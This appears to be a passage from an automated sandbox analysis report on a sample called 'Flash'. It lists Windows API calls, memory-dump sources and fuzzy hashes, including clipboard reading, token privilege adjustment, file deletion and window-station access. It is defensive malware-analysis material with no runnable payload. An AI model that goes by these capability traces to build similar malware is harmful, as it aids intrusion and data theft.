                                                        • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                        • Instruction ID: be5aae489344c51e74cc35f997fac2ad9abe6e61f30865c79f603d0c587498e2
                                                        • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                        • Instruction Fuzzy Hash: 95F085B6400208BFDF118F85EC00DEBBB79EB89324F0045A8FA045A211D232EA219BA0
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,?,009E27AF,?,00000001), ref: 009E4A63
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: a9296d3d1c05e0b712c5f7a5bf38b1f0f7a480803b9e8da86778fa173d798022
                                                        • Instruction ID: 0d93d15bd69770ced49c04e625a7703d3d48063a364cdff7af398e195d0783ca
                                                        • Opcode Fuzzy Hash: a9296d3d1c05e0b712c5f7a5bf38b1f0f7a480803b9e8da86778fa173d798022
                                                        • Instruction Fuzzy Hash: 14F01571145751CFCB369F66E494826BBF4AF143263208A7EE2D683610C7759D84DB84
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                        • Instruction ID: 1ad7dfd333380ef3119e057cdf76e76c39e1c8aad4e31c0975f5bbfdee77a48e
                                                        • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                        • Instruction Fuzzy Hash: 15F0F87240020DFFDF05CF94C941EAABB79FB54314F208599FD198A212D336DA61AB91
                                                        APIs
                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 009F09E4
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: 2997b82d2413a015309deae52ee0c8e9c6a723451a8eeb5d02bdb77b1728e15a
                                                        • Instruction ID: 0cf3db9f65c71fe819cfa36805e990ebdbc3123dc9fb8f63fd33578ddb1f4ca7
                                                        • Opcode Fuzzy Hash: 2997b82d2413a015309deae52ee0c8e9c6a723451a8eeb5d02bdb77b1728e15a
                                                        • Instruction Fuzzy Hash: FBE0863290012857C721E6989C05FEA77EDDB89791F0401B6FC08D7344D9609C818691
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00A34D31
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FolderPath_memmove
                                                        • String ID:
                                                        • API String ID: 3334745507-0
                                                        • Opcode ID: 49d76534c6b3f1b363d4d392f0558d203da31b9b40a86f88ad8ee811a6a6cbb9
                                                        • Instruction ID: 86cbe9fa84dcf2532ec6c1a719a98d3f9942e03e324d6e3fdcee8cfb4e218eaa
                                                        • Opcode Fuzzy Hash: 49d76534c6b3f1b363d4d392f0558d203da31b9b40a86f88ad8ee811a6a6cbb9
                                                        • Instruction Fuzzy Hash: ABD05EB190032C2BDB60E6A59C0DDB77BACD744220F0006A1BC9CC3101ED749D8586E0
                                                        APIs
                                                          • Part of subcall function 00A3384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00A33959,00000000,00000000,?,00A205DB,00A88070,00000002,?,?), ref: 00A338CA
                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00A205DB,00A88070,00000002,?,?,?,00000000), ref: 00A33967
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: File$PointerWrite
                                                        • String ID:
                                                        • API String ID: 539440098-0
                                                        • Opcode ID: c68f80f0efbb6447df7026172dfccfd66637a944cba3be36e2211b34cd7ea35c
                                                        • Instruction ID: 533bcef55afb8bd78eca91342c8177227e80bd50bd59d024c11ab88ec0ca6c1c
                                                        • Opcode Fuzzy Hash: c68f80f0efbb6447df7026172dfccfd66637a944cba3be36e2211b34cd7ea35c
                                                        • Instruction Fuzzy Hash: CAE04636400208BBDB20EF94D801E9ABBBCEB05320F004A5AFD4092111DBB2AE249BA0
                                                        APIs
                                                        • FindCloseChangeNotification.KERNEL32(?,?,00000000,00A12F8B), ref: 009E42EF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: b3be8d461b1f4bd961548bfa0f2bfcf8f3201dfafe5c4061a07a3d076b1b0db5
                                                        • Instruction ID: 9b749b8f4484471324b91be4c0149334f7d87b9fd29187e356e669ddd563d805
                                                        • Opcode Fuzzy Hash: b3be8d461b1f4bd961548bfa0f2bfcf8f3201dfafe5c4061a07a3d076b1b0db5
                                                        • Instruction Fuzzy Hash: ABE09275400B41CFC3324F1AE804412FBF8FFE13613214A2EE1E692660D3B0589A8B50
                                                        APIs
                                                        • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A33E7D,?,?,?), ref: 00A33F0D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CopyFile
                                                        • String ID:
                                                        • API String ID: 1304948518-0
                                                        • Opcode ID: 73579fcb47487e3cf2ae0aa8290fd198335cc36be5110f70fc133f95eddbe80a
                                                        • Instruction ID: 6a53e0267a66975b9aceb59d3360740e1f1f978efde87df3973ec03edab9acbe
                                                        • Opcode Fuzzy Hash: 73579fcb47487e3cf2ae0aa8290fd198335cc36be5110f70fc133f95eddbe80a
                                                        • Instruction Fuzzy Hash: 98D0A7315E020CBBEF50DFA0CC06FA9B7BCEB11706F1002E4F604D90E0DAB269149795
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00A206E6,00000000,00000000,00000000), ref: 009E42BF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: dd11ea113cb37a126ef21aa93a95ab4c2694e21f0939d6e6c7bed3eb4a5c07bc
                                                        • Instruction ID: 8b7dfeb709a1d80d637ebffba051552ee3e65392dcfbbbdd87e8d8a78be22280
                                                        • Opcode Fuzzy Hash: dd11ea113cb37a126ef21aa93a95ab4c2694e21f0939d6e6c7bed3eb4a5c07bc
                                                        • Instruction Fuzzy Hash: 12D0C97464020CBFEB10CB80DC46FAABBBCEB05710F200294FE04A6290E6F27E508B95
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00A33BFE), ref: 00A34FED
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 1756b50b9660f9c487f1c7194f9121287a0de9b65fe4cb96eecdac1625d9b606
                                                        • Instruction ID: 95f9cd377d9d1b4c99f37cdc19b4a9e0e2ee7fbf5ba6c752c1be7938b5546466
                                                        • Opcode Fuzzy Hash: 1756b50b9660f9c487f1c7194f9121287a0de9b65fe4cb96eecdac1625d9b606
                                                        • Instruction Fuzzy Hash: 9EB09234000600579D281F3C194849A3351584BBA9BDC1B82F478854E19279A88BA620
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: f83d4c3d54ec448f6b82ffd64562cf0ea045e2f75a2554b550da1e1a7d10b26d
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: 01B0927644020C77CE012A82EC03B693F299B80668F408020FB0C1C172A673E6A09689
                                                        APIs
                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 00A3D842
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: 625940f80c9b4deb449671f4bb2daf641ce0306143e15039f2070ade43571866
                                                        • Instruction ID: 268678af77de6ae65640a75dbe8395adba500ebf8e71579a27ec9626ed78bd4f
                                                        • Opcode Fuzzy Hash: 625940f80c9b4deb449671f4bb2daf641ce0306143e15039f2070ade43571866
                                                        • Instruction Fuzzy Hash: 38715C30208342CFC715EF65D491B6AB7E5AF88354F044A2DF9969B3A2DB30ED45CB52
                                                        APIs
                                                          • Part of subcall function 00A34005: FindFirstFileW.KERNEL32(?,?), ref: 00A3407C
                                                          • Part of subcall function 00A34005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A340CC
                                                          • Part of subcall function 00A34005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00A340DD
                                                          • Part of subcall function 00A34005: FindClose.KERNEL32(00000000), ref: 00A340F4
                                                        • GetLastError.KERNEL32 ref: 00A3C292
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                        • String ID:
                                                        • API String ID: 2191629493-0
                                                        • Opcode ID: bbfb20704d6e14cc10fac93c90b6c774d06aed4259aae426b1a014a392b87ef9
                                                        • Instruction ID: 5837fe3e40a5e8aa97eeff351e912cd67b876561a4038d67eddb6f1296e8a9f6
                                                        • Opcode Fuzzy Hash: bbfb20704d6e14cc10fac93c90b6c774d06aed4259aae426b1a014a392b87ef9
                                                        • Instruction Fuzzy Hash: 82F082312105104FCB14EF99D854F5AB7E9AF88320F05C45AF9059B392CB74BC41CB94
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A5D208
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A5D249
                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A5D28E
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A5D2B8
                                                        • SendMessageW.USER32 ref: 00A5D2E1
                                                        • _wcsncpy.LIBCMT ref: 00A5D359
                                                        • GetKeyState.USER32(00000011), ref: 00A5D37A
                                                        • GetKeyState.USER32(00000009), ref: 00A5D387
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A5D39D
                                                        • GetKeyState.USER32(00000010), ref: 00A5D3A7
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A5D3D0
                                                        • SendMessageW.USER32 ref: 00A5D3F7
                                                        • SendMessageW.USER32(?,00001030,?,00A5B9BA), ref: 00A5D4FD
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A5D513
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A5D526
                                                        • SetCapture.USER32(?), ref: 00A5D52F
                                                        • ClientToScreen.USER32(?,?), ref: 00A5D594
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A5D5A1
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A5D5BB
                                                        • ReleaseCapture.USER32 ref: 00A5D5C6
                                                        • GetCursorPos.USER32(?), ref: 00A5D600
                                                        • ScreenToClient.USER32(?,?), ref: 00A5D60D
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A5D669
                                                        • SendMessageW.USER32 ref: 00A5D697
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A5D6D4
                                                        • SendMessageW.USER32 ref: 00A5D703
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A5D724
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A5D733
                                                        • GetCursorPos.USER32(?), ref: 00A5D753
                                                        • ScreenToClient.USER32(?,?), ref: 00A5D760
                                                        • GetParent.USER32(?), ref: 00A5D780
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A5D7E9
                                                        • SendMessageW.USER32 ref: 00A5D81A
                                                        • ClientToScreen.USER32(?,?), ref: 00A5D878
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A5D8A8
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A5D8D2
                                                        • SendMessageW.USER32 ref: 00A5D8F5
                                                        • ClientToScreen.USER32(?,?), ref: 00A5D947
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A5D97B
                                                          • Part of subcall function 009D29AB: GetWindowLongW.USER32(?,000000EB), ref: 009D29BC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A5DA17
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 3977979337-4164748364
                                                        • Opcode ID: 620e75a975a49e4e5a9457805462c83bf0c4a7cf01244c563e61a1f2592c6ca0
                                                        • Instruction ID: d6f4e1f51b04555a3e1e1f873b4b3df39a739b37afb70c21711f8c3e0cb3364e
                                                        • Opcode Fuzzy Hash: 620e75a975a49e4e5a9457805462c83bf0c4a7cf01244c563e61a1f2592c6ca0
                                                        • Instruction Fuzzy Hash: CA429D34204241AFD725DF68C844FAABBF5FF88311F144619FA95872A1CBB19899CB62
                                                        APIs
                                                          • Part of subcall function 00A29399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A293E3
                                                          • Part of subcall function 00A29399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A29410
                                                          • Part of subcall function 00A29399: GetLastError.KERNEL32 ref: 00A2941D
                                                        • _memset.LIBCMT ref: 00A28F71
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A28FC3
                                                        • CloseHandle.KERNEL32(?), ref: 00A28FD4
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A28FEB
                                                        • GetProcessWindowStation.USER32 ref: 00A29004
                                                        • SetProcessWindowStation.USER32(00000000), ref: 00A2900E
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A29028
                                                          • Part of subcall function 00A28DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A28F27), ref: 00A28DFE
                                                          • Part of subcall function 00A28DE9: CloseHandle.KERNEL32(?,?,00A28F27), ref: 00A28E10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: 573a85e3b7d602a4cb8a8f3996d9d5424a5e84633d7206e83f2f3d86c8583239
                                                        • Instruction ID: bce3249da2dc1b60330d71d44055f4c4f6392ade4c52c46a85693417e4189bdd
                                                        • Opcode Fuzzy Hash: 573a85e3b7d602a4cb8a8f3996d9d5424a5e84633d7206e83f2f3d86c8583239
                                                        • Instruction Fuzzy Hash: A6817A71800219BFEF11DFA9ED49AEF7B79EF04704F044229F911A6260DB718E659B20
                                                        APIs
                                                        • OpenClipboard.USER32(00A60980), ref: 00A4465C
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A4466A
                                                        • GetClipboardData.USER32(0000000D), ref: 00A44672
                                                        • CloseClipboard.USER32 ref: 00A4467E
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A4469A
                                                        • CloseClipboard.USER32 ref: 00A446A4
                                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A446B9
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00A446C6
                                                        • GetClipboardData.USER32(00000001), ref: 00A446CE
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A446DB
                                                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00A4470F
                                                        • CloseClipboard.USER32 ref: 00A4481F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                        • String ID:
                                                        • API String ID: 3222323430-0
                                                        • Opcode ID: 152f84356f8892fabbfe50aa5808aedb3bc05ee38e9e18edd19ae49e74550644
                                                        • Instruction ID: a0e5d0c8c3de8ecf6e4b5ae37a1d96f7767ffa9a521a11c70f81262f42535109
                                                        • Opcode Fuzzy Hash: 152f84356f8892fabbfe50aa5808aedb3bc05ee38e9e18edd19ae49e74550644
                                                        • Instruction Fuzzy Hash: 6351D135244201ABD301EFA4DC99F6FB7B8AFC8B41F014529F656D21E2DFB0D9468B62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A3CDD0
                                                        • FindClose.KERNEL32(00000000), ref: 00A3CE24
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A3CE49
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A3CE60
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3CE87
